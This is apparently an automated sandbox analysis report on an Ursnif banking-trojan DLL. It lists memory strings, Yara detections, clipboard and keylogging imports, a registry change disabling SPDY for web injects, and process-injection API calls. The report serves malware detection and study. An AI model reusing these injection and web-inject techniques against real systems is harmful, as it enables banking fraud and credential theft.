Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: loaddll32.exe, 00000000.00000002.891686780.000000001008B000.00000002.00020000.sdmp	String found in binary or memory: http://www.xnview.comJ
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY

Contains functionality to read the clipboard data

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1007F8B0 EntryPoint,LoadIconW,CreateMenu,CloseFigure,GetDoubleClickTime,CharUpperW,GetMessageExtraInfo,OpenIcon,GetMenuItemCount,EndDoc,IsIconic,GetWindowContextHelpId,GetClipboardData,StrokePath,UnrealizeObject,GetMapMode,IsCharAlphaA,FlattenPath,EnumClipboardFormats,GetSysColorBrush,DestroyMenu,GetDCBrushColor,UpdateColors,GetColorSpace,CharNextA,GetQueueStatus,GetPolyFillMode,DestroyWindow,IsCharLowerA,SetMetaRgn,GetObjectType,EndPath,GetObjectType,IsCharAlphaW,OemKeyScan,CloseMetaFile,GetSysColorBrush,LoadCursorFromFileA,GetPixelFormat,SwapBuffers,UnrealizeObject,GetGraphicsMode,GetGraphicsMode,GetMapMode,UnrealizeObject,FlattenPath,GetMessagePos,GetTopWindow,PathToRegion,CloseWindow,GetDlgCtrlID,GetStretchBltMode,GetProcessWindowStation,CancelDC,CharLowerA,GetThreadDesktop,VkKeyScanW,CreatePatternBrush,DeleteColorSpace,IsWindowUnicode,WindowFromDC,GetKeyState,IsCharLowerA,CreateHalftonePalette,GetClipboardSequenceNumber,PathToRegion,GetMenuCheckMarkDimensions,LoadIconA,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextChars

0_2_1007F8B0

Yara detected Keylogger Generic

Source: Yara match	File source: https___purefile24.top_4352wedfoifom.dll, type: SAMPLE
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01111A0B NtMapViewOfSection,	0_2_01111A0B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01111F8C GetProcAddress,NtCreateSection,memset,	0_2_01111F8C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011115D2 GetLastError,NtClose,LdrInitializeThunk,	0_2_011115D2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011123E5 NtQueryVirtualMemory,	0_2_011123E5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02679E28 NtOpenProcess,LdrInitializeThunk,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_02679E28
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_026764BF NtMapViewOfSection,	0_2_026764BF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02674093 GetProcAddress,NtCreateSection,memset,	0_2_02674093
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0267B2CD NtQueryVirtualMemory,	0_2_0267B2CD
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose,	32_2_00FC88E0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCA9D8 NtWriteVirtualMemory,	32_2_00FCA9D8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB91C0 NtQueryInformationProcess,	32_2_00FB91C0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC1920 NtReadVirtualMemory,	32_2_00FC1920
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB6104 NtQueryInformationProcess,	32_2_00FB6104
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCDE98 NtAllocateVirtualMemory,	32_2_00FCDE98
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC67C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	32_2_00FC67C8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCD748 NtMapViewOfSection,	32_2_00FCD748
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC7B34 NtCreateSection,	32_2_00FC7B34
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCEB10 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	32_2_00FCEB10
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FE9002 NtProtectVirtualMemory,NtProtectVirtualMemory,	32_2_00FE9002
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose,	35_2_00000284AA6E88E0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D91C0 NtQueryInformationProcess,	35_2_00000284AA6D91C0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA709002 NtProtectVirtualMemory,NtProtectVirtualMemory,	35_2_00000284AA709002

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011121C4	0_2_011121C4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0267B0AC	0_2_0267B0AC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02678534	0_2_02678534
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC2A04	32_2_00FC2A04
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC67C8	32_2_00FC67C8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB932C	32_2_00FB932C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC64DC	32_2_00FC64DC
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCC8A8	32_2_00FCC8A8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC909C	32_2_00FC909C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB3498	32_2_00FB3498
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCCC80	32_2_00FCCC80
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCF06C	32_2_00FCF06C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCCC1C	32_2_00FCCC1C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FBFDD8	32_2_00FBFDD8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD31A4	32_2_00FD31A4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FBA1A0	32_2_00FBA1A0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD117C	32_2_00FD117C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC096B	32_2_00FC096B
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD654C	32_2_00FD654C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB8D2C	32_2_00FB8D2C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC051C	32_2_00FC051C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD7EDC	32_2_00FD7EDC
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB7ED8	32_2_00FB7ED8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC0EC4	32_2_00FC0EC4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB4AA0	32_2_00FB4AA0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FBA6A4	32_2_00FBA6A4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FBB2A4	32_2_00FBB2A4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC3A9C	32_2_00FC3A9C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD5A88	32_2_00FD5A88
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC4670	32_2_00FC4670
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC2648	32_2_00FC2648
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB964C	32_2_00FB964C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD7228	32_2_00FD7228
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCC224	32_2_00FCC224
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD6BDC	32_2_00FD6BDC
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCF7D4	32_2_00FCF7D4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD4FA8	32_2_00FD4FA8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB6380	32_2_00FB6380
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB5B40	32_2_00FB5B40
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E2A04	35_2_00000284AA6E2A04
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D932C	35_2_00000284AA6D932C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6EF06C	35_2_00000284AA6EF06C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6ECC80	35_2_00000284AA6ECC80
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6ECC1C	35_2_00000284AA6ECC1C
